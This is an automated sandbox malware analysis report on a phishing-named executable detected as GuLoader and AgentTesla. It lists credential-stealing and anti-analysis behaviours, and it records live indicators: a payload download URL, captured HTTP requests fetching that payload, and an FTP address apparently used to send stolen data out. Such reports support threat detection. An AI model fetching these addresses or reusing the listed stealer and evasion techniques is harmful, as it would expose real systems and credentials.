Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PO#4200000866.exe

Overview

General Information

Sample Name:PO#4200000866.exe
Analysis ID:624323
MD5:5d0444b70ff5caa4ec3b2ca2e563e724
SHA1:27309fdae9005f71dcde3501f023819ae6dba6cb
SHA256:fd620fd2a9d5ca1dea1e11013eb4ec486f2f5cb340cd28bcbe39e78271fc5d26
Infos:

Detection

AgentTesla, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Antivirus detection for URL or domain
Yara detected GuLoader
Tries to steal Mail credentials (via file / registry access)
Initial sample is a PE file and has a suspicious name
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
C2 URLs / IPs found in malware configuration
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
PE file does not import any functions
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Contains functionality to detect virtual machines (SLDT)
PE / OLE file has an invalid certificate
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

  • System is w10x64native
  • PO#4200000866.exe (PID: 7860 cmdline: "C:\Users\user\Desktop\PO#4200000866.exe" MD5: 5D0444B70FF5CAA4EC3B2CA2E563E724)
    • CasPol.exe (PID: 6396 cmdline: "C:\Users\user\Desktop\PO#4200000866.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
    • CasPol.exe (PID: 1516 cmdline: "C:\Users\user\Desktop\PO#4200000866.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
      • conhost.exe (PID: 3884 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • cleanup
{"Payload URL": "http://finseb.com/qwer/COrg_ZBOJvB194.bin"}
SourceRuleDescriptionAuthorStrings
00000008.00000000.41902252759.0000000001120000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
    00000008.00000002.46737865180.000000001D891000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000008.00000002.46737865180.000000001D891000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000001.00000002.42101494112.0000000003C70000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
          Process Memory Space: CasPol.exe PID: 1516JoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            Click to see the 1 entries
            No Sigma rule has matched
            No Snort rule has matched

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: 00000008.00000000.41902252759.0000000001120000.00000040.00000400.00020000.00000000.sdmpMalware Configuration Extractor: GuLoader {"Payload URL": "http://finseb.com/qwer/COrg_ZBOJvB194.bin"}
            Source: PO#4200000866.exeVirustotal: Detection: 10%Perma Link
            Source: ftp://ftp.solucionest.com.ar/log2Avira URL Cloud: Label: malware
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 8_2_20809708 CryptUnprotectData,8_2_20809708
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 8_2_2080A128 CryptUnprotectData,8_2_2080A128
            Source: PO#4200000866.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
            Source: unknownHTTPS traffic detected: 131.226.4.8:443 -> 192.168.11.20:49761 version: TLS 1.2
            Source: PO#4200000866.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: Binary string: D:\SourceCode\DevicePlugin\production_V4.2\Service\ServiceSDK\Release\DeviceServicePlugin\DeviceServicePlugin.pdb source: PO#4200000866.exe, 00000001.00000002.42100146180.0000000002935000.00000004.00000800.00020000.00000000.sdmp, DeviceServicePlugin.dll.1.dr
            Source: Binary string: D:\SourceCode\DevicePlugin\production_V4.2\Service\ServiceSDK\Release\DeviceServicePlugin\DeviceServicePlugin.pdb22 source: PO#4200000866.exe, 00000001.00000002.42100146180.0000000002935000.00000004.00000800.00020000.00000000.sdmp, DeviceServicePlugin.dll.1.dr
            Source: C:\Users\user\Desktop\PO#4200000866.exeCode function: 1_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,1_2_00405D74
            Source: C:\Users\user\Desktop\PO#4200000866.exeCode function: 1_2_0040699E FindFirstFileW,FindClose,1_2_0040699E
            Source: C:\Users\user\Desktop\PO#4200000866.exeCode function: 1_2_0040290B FindFirstFileW,1_2_0040290B

            Networking

            barindex
            Source: Malware configuration extractorURLs: http://finseb.com/qwer/COrg_ZBOJvB194.bin
            Source: Joe Sandbox ViewASN Name: UNASSIGNED UNASSIGNED
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: global trafficHTTP traffic detected: GET /qwer/COrg_ZBOJvB194.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: www.finseb.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /qwer/COrg_ZBOJvB194.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: finseb.comCache-Control: no-cache
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
            Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
            Source: CasPol.exe, 00000008.00000002.46737865180.000000001D891000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ftp://ftp.solucionest.com.ar/log2
            Source: CasPol.exe, 00000008.00000002.46737865180.000000001D891000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
            Source: CasPol.exe, 00000008.00000002.46737865180.000000001D891000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://DynDns.comDynDNSnamejidpasswordPsi/Psi
            Source: CasPol.exe, 00000008.00000002.46739371983.000000001D9A6000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000008.00000002.46737865180.000000001D891000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000008.00000003.42144931318.000000001C661000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://EQDgdAvRkA6D7Crd.com
            Source: PO#4200000866.exe, 00000001.00000002.42100146180.0000000002935000.00000004.00000800.00020000.00000000.sdmp, DeviceServicePlugin.dll.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
            Source: PO#4200000866.exe, 00000001.00000002.42100146180.0000000002935000.00000004.00000800.00020000.00000000.sdmp, DeviceServicePlugin.dll.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
            Source: PO#4200000866.exeString found in binary or memory: http://crl.certum.pl/ctnca.crl0k
            Source: PO#4200000866.exeString found in binary or memory: http://crl.certum.pl/ctnca2.crl0l
            Source: PO#4200000866.exeString found in binary or memory: http://crl.certum.pl/ctsca2021.crl0o
            Source: CasPol.exe, 00000008.00000003.42075500608.0000000001472000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000008.00000002.46716043130.0000000001463000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
            Source: PO#4200000866.exe, 00000001.00000002.42100146180.0000000002935000.00000004.00000800.00020000.00000000.sdmp, DeviceServicePlugin.dll.1.drString found in binary or memory: http://crl.globalsign.com/gsextendcodesignsha2g3.crl0
            Source: PO#4200000866.exe, 00000001.00000002.42100146180.0000000002935000.00000004.00000800.00020000.00000000.sdmp, DeviceServicePlugin.dll.1.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0b
            Source: PO#4200000866.exe, 00000001.00000002.42100146180.0000000002935000.00000004.00000800.00020000.00000000.sdmp, DeviceServicePlugin.dll.1.drString found in binary or memory: http://crl.globalsign.com/root.crl0G
            Source: CasPol.exe, 00000008.00000003.42075500608.0000000001472000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000008.00000002.46716043130.0000000001463000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: PO#4200000866.exe, 00000001.00000002.42100146180.0000000002935000.00000004.00000800.00020000.00000000.sdmp, DeviceServicePlugin.dll.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
            Source: PO#4200000866.exe, 00000001.00000002.42100146180.0000000002935000.00000004.00000800.00020000.00000000.sdmp, DeviceServicePlugin.dll.1.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
            Source: PO#4200000866.exe, 00000001.00000002.42100146180.0000000002935000.00000004.00000800.00020000.00000000.sdmp, DeviceServicePlugin.dll.1.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
            Source: PO#4200000866.exe, 00000001.00000002.42100146180.0000000002935000.00000004.00000800.00020000.00000000.sdmp, DeviceServicePlugin.dll.1.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
            Source: CasPol.exe, 00000008.00000002.46715489088.0000000001426000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://finseb.com/qwer/COrg_ZBOJvB194.bin
            Source: PO#4200000866.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: PO#4200000866.exe, 00000001.00000002.42100146180.0000000002935000.00000004.00000800.00020000.00000000.sdmp, DeviceServicePlugin.dll.1.drString found in binary or memory: http://ocsp.digicert.com0C
            Source: PO#4200000866.exe, 00000001.00000002.42100146180.0000000002935000.00000004.00000800.00020000.00000000.sdmp, DeviceServicePlugin.dll.1.drString found in binary or memory: http://ocsp.digicert.com0O
            Source: PO#4200000866.exe, 00000001.00000002.42100146180.0000000002935000.00000004.00000800.00020000.00000000.sdmp, DeviceServicePlugin.dll.1.drString found in binary or memory: http://ocsp.globalsign.com/rootr103
            Source: PO#4200000866.exe, 00000001.00000002.42100146180.0000000002935000.00000004.00000800.00020000.00000000.sdmp, DeviceServicePlugin.dll.1.drString found in binary or memory: http://ocsp2.globalsign.com/gsextendcodesignsha2g30U
            Source: PO#4200000866.exe, 00000001.00000002.42100146180.0000000002935000.00000004.00000800.00020000.00000000.sdmp, DeviceServicePlugin.dll.1.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
            Source: CasPol.exe, 00000008.00000002.46737865180.000000001D891000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pXfISF.com
            Source: PO#4200000866.exeString found in binary or memory: http://repository.certum.pl/ctnca.cer09
            Source: PO#4200000866.exeString found in binary or memory: http://repository.certum.pl/ctnca2.cer09
            Source: PO#4200000866.exeString found in binary or memory: http://repository.certum.pl/ctsca2021.cer0
            Source: CasPol.exe, 00000008.00000002.46739371983.000000001D9A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: PO#4200000866.exe, 00000001.00000002.42100146180.0000000002935000.00000004.00000800.00020000.00000000.sdmp, DeviceServicePlugin.dll.1.drString found in binary or memory: http://secure.globalsign.com/cacert/gsextendcodesignsha2g3ocsp.crt0
            Source: PO#4200000866.exeString found in binary or memory: http://subca.ocsp-certum.com01
            Source: PO#4200000866.exeString found in binary or memory: http://subca.ocsp-certum.com02
            Source: PO#4200000866.exeString found in binary or memory: http://subca.ocsp-certum.com05
            Source: PO#4200000866.exeString found in binary or memory: http://www.certum.pl/CPS0
            Source: PO#4200000866.exe, 00000001.00000002.42100146180.0000000002935000.00000004.00000800.00020000.00000000.sdmp, DeviceServicePlugin.dll.1.drString found in binary or memory: http://www.digicert.com/CPS0
            Source: PO#4200000866.exe, 00000001.00000002.42100146180.0000000002935000.00000004.00000800.00020000.00000000.sdmp, iso_3166.xml.1.drString found in binary or memory: http://www.iso.org/iso/country_codes
            Source: PO#4200000866.exe, 00000001.00000002.42100146180.0000000002935000.00000004.00000800.00020000.00000000.sdmp, DeviceServicePlugin.dll.1.drString found in binary or memory: https://www.asus.com/campaign/aura/global/download.php
            Source: PO#4200000866.exe, 00000001.00000002.42100146180.0000000002935000.00000004.00000800.00020000.00000000.sdmp, DeviceServicePlugin.dll.1.drString found in binary or memory: https://www.digicert.com/CPS0
            Source: CasPol.exe, 00000008.00000002.46715489088.0000000001426000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.finseb.com/
            Source: CasPol.exe, 00000008.00000002.46715489088.0000000001426000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.finseb.com/X
            Source: CasPol.exe, 00000008.00000002.46715733863.0000000001446000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.finseb.com/qwer/COrg_ZBOJvB194.bin
            Source: PO#4200000866.exe, 00000001.00000002.42100146180.0000000002935000.00000004.00000800.00020000.00000000.sdmp, DeviceServicePlugin.dll.1.drString found in binary or memory: https://www.globalsign.com/repository/0
            Source: CasPol.exe, 00000008.00000002.46737865180.000000001D891000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www
            Source: unknownDNS traffic detected: queries for: finseb.com
            Source: global trafficHTTP traffic detected: GET /qwer/COrg_ZBOJvB194.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: www.finseb.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /qwer/COrg_ZBOJvB194.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: finseb.comCache-Control: no-cache
            Source: unknownHTTPS traffic detected: 131.226.4.8:443 -> 192.168.11.20:49761 version: TLS 1.2
            Source: C:\Users\user\Desktop\PO#4200000866.exeCode function: 1_2_00405809 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,1_2_00405809

            System Summary

            barindex
            Source: initial sampleStatic PE information: Filename: PO#4200000866.exe
            Source: PO#4200000866.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
            Source: C:\Users\user\Desktop\PO#4200000866.exeCode function: 1_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,1_2_00403640
            Source: C:\Users\user\Desktop\PO#4200000866.exeCode function: 1_2_00406D5F1_2_00406D5F
            Source: C:\Users\user\Desktop\PO#4200000866.exeCode function: 1_2_715D1BFF1_2_715D1BFF
            Source: C:\Users\user\Desktop\PO#4200000866.exeCode function: 1_2_03C822AF1_2_03C822AF
            Source: C:\Users\user\Desktop\PO#4200000866.exeCode function: 1_2_03C80A411_2_03C80A41
            Source: C:\Users\user\Desktop\PO#4200000866.exeCode function: 1_2_03C71BC01_2_03C71BC0
            Source: C:\Users\user\Desktop\PO#4200000866.exeCode function: 1_2_03C7ABC91_2_03C7ABC9
            Source: C:\Users\user\Desktop\PO#4200000866.exeCode function: 1_2_03C77FC81_2_03C77FC8
            Source: C:\Users\user\Desktop\PO#4200000866.exeCode function: 1_2_03C717D31_2_03C717D3
            Source: C:\Users\user\Desktop\PO#4200000866.exeCode function: 1_2_03C71BFF1_2_03C71BFF
            Source: C:\Users\user\Desktop\PO#4200000866.exeCode function: 1_2_03C777FC1_2_03C777FC
            Source: C:\Users\user\Desktop\PO#4200000866.exeCode function: 1_2_03C70F8E1_2_03C70F8E
            Source: C:\Users\user\Desktop\PO#4200000866.exeCode function: 1_2_03C71B8A1_2_03C71B8A
            Source: C:\Users\user\Desktop\PO#4200000866.exeCode function: 1_2_03C717961_2_03C71796
            Source: C:\Users\user\Desktop\PO#4200000866.exeCode function: 1_2_03C71F941_2_03C71F94
            Source: C:\Users\user\Desktop\PO#4200000866.exeCode function: 1_2_03C77F4D1_2_03C77F4D
            Source: C:\Users\user\Desktop\PO#4200000866.exeCode function: 1_2_03C70F571_2_03C70F57
            Source: C:\Users\user\Desktop\PO#4200000866.exeCode function: 1_2_03C71F541_2_03C71F54
            Source: C:\Users\user\Desktop\PO#4200000866.exeCode function: 1_2_03C7175B1_2_03C7175B
            Source: C:\Users\user\Desktop\PO#4200000866.exeCode function: 1_2_03C833621_2_03C83362
            Source: C:\Users\user\Desktop\PO#4200000866.exeCode function: 1_2_03C717071_2_03C71707
            Source: C:\Users\user\Desktop\PO#4200000866.exeCode function: 1_2_03C7AB0D1_2_03C7AB0D
            Source: C:\Users\user\Desktop\PO#4200000866.exeCode function: 1_2_03C71B0C1_2_03C71B0C
            Source: C:\Users\user\Desktop\PO#4200000866.exeCode function: 1_2_03C717141_2_03C71714
            Source: C:\Users\user\Desktop\PO#4200000866.exeCode function: 1_2_03C71F101_2_03C71F10
            Source: C:\Users\user\Desktop\PO#4200000866.exeCode function: 1_2_03C70F1A1_2_03C70F1A
            Source: C:\Users\user\Desktop\PO#4200000866.exeCode function: 1_2_03C782C51_2_03C782C5
            Source: C:\Users\user\Desktop\PO#4200000866.exeCode function: 1_2_03C702C21_2_03C702C2
            Source: C:\Users\user\Desktop\PO#4200000866.exeCode function: 1_2_03C77ED71_2_03C77ED7
            Source: C:\Users\user\Desktop\PO#4200000866.exeCode function: 1_2_03C71ED01_2_03C71ED0
            Source: C:\Users\user\Desktop\PO#4200000866.exeCode function: 1_2_03C71ADC1_2_03C71ADC
            Source: C:\Users\user\Desktop\PO#4200000866.exeCode function: 1_2_03C832E61_2_03C832E6
            Source: C:\Users\user\Desktop\PO#4200000866.exeCode function: 1_2_03C716E81_2_03C716E8
            Source: C:\Users\user\Desktop\PO#4200000866.exeCode function: 1_2_03C76A821_2_03C76A82
            Source: C:\Users\user\Desktop\PO#4200000866.exeCode function: 1_2_03C71E9F1_2_03C71E9F
            Source: C:\Users\user\Desktop\PO#4200000866.exeCode function: 1_2_03C71AAA1_2_03C71AAA
            Source: C:\Users\user\Desktop\PO#4200000866.exeCode function: 1_2_03C77EA81_2_03C77EA8
            Source: C:\Users\user\Desktop\PO#4200000866.exeCode function: 1_2_03C70EB81_2_03C70EB8
            Source: C:\Users\user\Desktop\PO#4200000866.exeCode function: 1_2_03C702401_2_03C70240
            Source: C:\Users\user\Desktop\PO#4200000866.exeCode function: 1_2_03C7B64A1_2_03C7B64A
            Source: C:\Users\user\Desktop\PO#4200000866.exeCode function: 1_2_03C71A691_2_03C71A69
            Source: C:\Users\user\Desktop\PO#4200000866.exeCode function: 1_2_03C71E681_2_03C71E68
            Source: C:\Users\user\Desktop\PO#4200000866.exeCode function: 1_2_03C7A67E1_2_03C7A67E
            Source: C:\Users\user\Desktop\PO#4200000866.exeCode function: 1_2_03C7027D1_2_03C7027D
            Source: C:\Users\user\Desktop\PO#4200000866.exeCode function: 1_2_03C7AA7D1_2_03C7AA7D
            Source: C:\Users\user\Desktop\PO#4200000866.exeCode function: 1_2_03C71A231_2_03C71A23
            Source: C:\Users\user\Desktop\PO#4200000866.exeCode function: 1_2_03C7A9CA1_2_03C7A9CA
            Source: C:\Users\user\Desktop\PO#4200000866.exeCode function: 1_2_03C84DC71_2_03C84DC7
            Source: C:\Users\user\Desktop\PO#4200000866.exeCode function: 1_2_03C71DEF1_2_03C71DEF
            Source: C:\Users\user\Desktop\PO#4200000866.exeCode function: 1_2_03C719EB1_2_03C719EB
            Source: C:\Users\user\Desktop\PO#4200000866.exeCode function: 1_2_03C7018E1_2_03C7018E
            Source: C:\Users\user\Desktop\PO#4200000866.exeCode function: 1_2_03C71DB21_2_03C71DB2
            Source: C:\Users\user\Desktop\PO#4200000866.exeCode function: 1_2_03C7A9B91_2_03C7A9B9
            Source: C:\Users\user\Desktop\PO#4200000866.exeCode function: 1_2_03C781561_2_03C78156
            Source: C:\Users\user\Desktop\PO#4200000866.exeCode function: 1_2_03C719671_2_03C71967
            Source: C:\Users\user\Desktop\PO#4200000866.exeCode function: 1_2_03C719651_2_03C71965
            Source: C:\Users\user\Desktop\PO#4200000866.exeCode function: 1_2_03C7B56E1_2_03C7B56E
            Source: C:\Users\user\Desktop\PO#4200000866.exeCode function: 1_2_03C7A96C1_2_03C7A96C
            Source: C:\Users\user\Desktop\PO#4200000866.exeCode function: 1_2_03C71D6A1_2_03C71D6A
            Source: C:\Users\user\Desktop\PO#4200000866.exeCode function: 1_2_03C76D711_2_03C76D71
            Source: C:\Users\user\Desktop\PO#4200000866.exeCode function: 1_2_03C701001_2_03C70100
            Source: C:\Users\user\Desktop\PO#4200000866.exeCode function: 1_2_03C7AD111_2_03C7AD11
            Source: C:\Users\user\Desktop\PO#4200000866.exeCode function: 1_2_03C7B52E1_2_03C7B52E
            Source: C:\Users\user\Desktop\PO#4200000866.exeCode function: 1_2_03C719311_2_03C71931
            Source: C:\Users\user\Desktop\PO#4200000866.exeCode function: 1_2_03C7793D1_2_03C7793D
            Source: C:\Users\user\Desktop\PO#4200000866.exeCode function: 1_2_03C7ACCA1_2_03C7ACCA
            Source: C:\Users\user\Desktop\PO#4200000866.exeCode function: 1_2_03C7A8DD1_2_03C7A8DD
            Source: C:\Users\user\Desktop\PO#4200000866.exeCode function: 1_2_03C7A0E21_2_03C7A0E2
            Source: C:\Users\user\Desktop\PO#4200000866.exeCode function: 1_2_03C778E11_2_03C778E1
            Source: C:\Users\user\Desktop\PO#4200000866.exeCode function: 1_2_03C718EA1_2_03C718EA
            Source: C:\Users\user\Desktop\PO#4200000866.exeCode function: 1_2_03C7B4F71_2_03C7B4F7
            Source: C:\Users\user\Desktop\PO#4200000866.exeCode function: 1_2_03C71CF51_2_03C71CF5
            Source: C:\Users\user\Desktop\PO#4200000866.exeCode function: 1_2_03C7A8F31_2_03C7A8F3
            Source: C:\Users\user\Desktop\PO#4200000866.exeCode function: 1_2_03C7B0801_2_03C7B080
            Source: C:\Users\user\Desktop\PO#4200000866.exeCode function: 1_2_03C7788D1_2_03C7788D
            Source: C:\Users\user\Desktop\PO#4200000866.exeCode function: 1_2_03C7788B1_2_03C7788B
            Source: C:\Users\user\Desktop\PO#4200000866.exeCode function: 1_2_03C770921_2_03C77092
            Source: C:\Users\user\Desktop\PO#4200000866.exeCode function: 1_2_03C7189A1_2_03C7189A
            Source: C:\Users\user\Desktop\PO#4200000866.exeCode function: 1_2_03C780A91_2_03C780A9
            Source: C:\Users\user\Desktop\PO#4200000866.exeCode function: 1_2_03C718A81_2_03C718A8
            Source: C:\Users\user\Desktop\PO#4200000866.exeCode function: 1_2_03C71CB41_2_03C71CB4
            Source: C:\Users\user\Desktop\PO#4200000866.exeCode function: 1_2_03C700BC1_2_03C700BC
            Source: C:\Users\user\Desktop\PO#4200000866.exeCode function: 1_2_03C700BA1_2_03C700BA
            Source: C:\Users\user\Desktop\PO#4200000866.exeCode function: 1_2_03C7104D1_2_03C7104D
            Source: C:\Users\user\Desktop\PO#4200000866.exeCode function: 1_2_03C7AC771_2_03C7AC77
            Source: C:\Users\user\Desktop\PO#4200000866.exeCode function: 1_2_03C71C731_2_03C71C73
            Source: C:\Users\user\Desktop\PO#4200000866.exeCode function: 1_2_03C700721_2_03C70072
            Source: C:\Users\user\Desktop\PO#4200000866.exeCode function: 1_2_03C718721_2_03C71872
            Source: C:\Users\user\Desktop\PO#4200000866.exeCode function: 1_2_03C7B0031_2_03C7B003
            Source: C:\Users\user\Desktop\PO#4200000866.exeCode function: 1_2_03C700011_2_03C70001
            Source: C:\Users\user\Desktop\PO#4200000866.exeCode function: 1_2_03C7000B1_2_03C7000B
            Source: C:\Users\user\Desktop\PO#4200000866.exeCode function: 1_2_03C7100B1_2_03C7100B
            Source: C:\Users\user\Desktop\PO#4200000866.exeCode function: 1_2_03C718091_2_03C71809
            Source: C:\Users\user\Desktop\PO#4200000866.exeCode function: 1_2_03C8283A1_2_03C8283A
            Source: C:\Users\user\Desktop\PO#4200000866.exeCode function: 1_2_03C7003D1_2_03C7003D
            Source: C:\Users\user\Desktop\PO#4200000866.exeCode function: 1_2_03C7183C1_2_03C7183C
            Source: C:\Users\user\Desktop\PO#4200000866.exeCode function: 1_2_03C71C391_2_03C71C39
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 8_2_0104F7408_2_0104F740
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 8_2_010437C08_2_010437C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 8_2_0104DE288_2_0104DE28
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 8_2_01042A708_2_01042A70
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 8_2_1D6B6B638_2_1D6B6B63
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 8_2_1D6BA1608_2_1D6BA160
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 8_2_1D6B98908_2_1D6B9890
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 8_2_1D6B95488_2_1D6B9548
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 8_2_208060888_2_20806088
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 8_2_2080D9F08_2_2080D9F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 8_2_20800B138_2_20800B13
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 8_2_2080B4588_2_2080B458
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 8_2_2080DD908_2_2080DD90
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 8_2_2080F1188_2_2080F118
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 8_2_2080ED408_2_2080ED40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 8_2_208072608_2_20807260
            Source: C:\Users\user\Desktop\PO#4200000866.exeCode function: 1_2_03C842AE NtProtectVirtualMemory,1_2_03C842AE
            Source: C:\Users\user\Desktop\PO#4200000866.exeCode function: 1_2_03C822AF NtAllocateVirtualMemory,1_2_03C822AF
            Source: C:\Users\user\Desktop\PO#4200000866.exeCode function: 1_2_03C84890 NtResumeThread,1_2_03C84890
            Source: library.dll.1.drStatic PE information: No import functions for PE file found
            Source: PO#4200000866.exe, 00000001.00000002.42100146180.0000000002935000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameDeviceServicePlugin.dllL vs PO#4200000866.exe
